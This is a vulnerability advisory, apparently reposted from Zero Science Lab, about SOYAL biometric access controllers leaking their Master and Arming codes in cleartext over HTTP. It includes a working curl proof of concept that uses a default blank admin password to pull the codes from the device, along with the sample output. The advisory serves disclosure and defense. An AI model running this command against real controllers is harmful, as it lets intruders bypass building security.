SOYAL Biometric Access Control System 5.0 Master Code Disclosure

2021.03.20
Credit: LiquidWorm
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

SOYAL Biometric Access Control System 5.0 Master Code Disclosure Vendor: SOYAL Technology Co., Ltd Product web page: https://www.soyal.com.tw | https://www.soyal.com Affected version: AR-727 i/CM - F/W: 5.0 AR837E/EF - F/W: 4.3 AR725Ev2 - F/W: 4.3 191231 AR331/725E - F/W: 4.2 AR837E/EF - F/W: 4.1 AR-727CM /i - F/W: 4.09 AR-727CM /i - F/W: 4.06 AR-837E - F/W: 3.03 Summary: Soyal Access systems are built into Raytel Door Entry Systems and are providing access and lift control to many buildings from public and private apartment blocks to prestigious public buildings. Desc: The controller suffers from a cleartext transmission of sensitive information. This allows interception of the HTTP traffic and disclose the Master code and the Arming code via a man-in-the-middle attack. An attacker can obtain these codes to enter into the controller's Programming mode and bypass physical security controls in place. Tested on: SOYAL Technology WebServer 2.0 SOYAL Serial Device Server 4.03A SOYAL Serial Device Server 4.01n SOYAL Serial Device Server 3.07n Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5630 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5630.php 25.01.2021 -- $ curl 'http://192.168.1.1/CtrlParam.htm' \ -H 'Authorization: Basic YWRtaW46' | \ grep -ni -B1 'masterCode\|armCode' <td><font face="Arial,Helvetica">Master Code (6 Digital) </font></td> <td colspan="2"><input type=text name="masterCode" size=6 maxlength=6 value=123456></td></tr> <td>Arming Code (4 Digital) </td> <td colspan="2"><input type=text name="armCode" size=4 maxlength=4 value=1234></td></tr>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top